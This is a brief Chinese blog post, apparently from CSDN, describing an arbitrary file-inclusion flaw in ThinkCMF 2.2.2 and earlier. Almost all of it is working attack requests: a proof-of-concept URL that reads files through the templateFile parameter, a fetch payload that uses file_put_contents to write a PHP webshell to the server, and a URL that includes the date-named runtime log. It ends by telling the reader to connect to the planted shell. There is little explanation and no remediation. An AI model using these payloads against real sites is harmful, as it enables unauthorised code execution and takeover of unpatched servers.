thinkcmf任意包含漏洞

thinkcmf影响范围:

thinkcmf <= 2.2.2

安装好thinkcmf:

poc:

?a=display&templateFile=README.md

 通过模板缓存实现的漏洞,可以读取和写入日志文件:

 写入webshell:

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('1.php','<?php phpinfo(); ?>')</php>

 写入,然后访问日志文件,格式是年-月-日.log


?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('1.php','<?php phpinfo(); ?>')</php>

http://ip/?a=display&templateFile=data/runtime/Logs/Portal/yy_mm_dd.log

然后,连接一下就ok了。

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值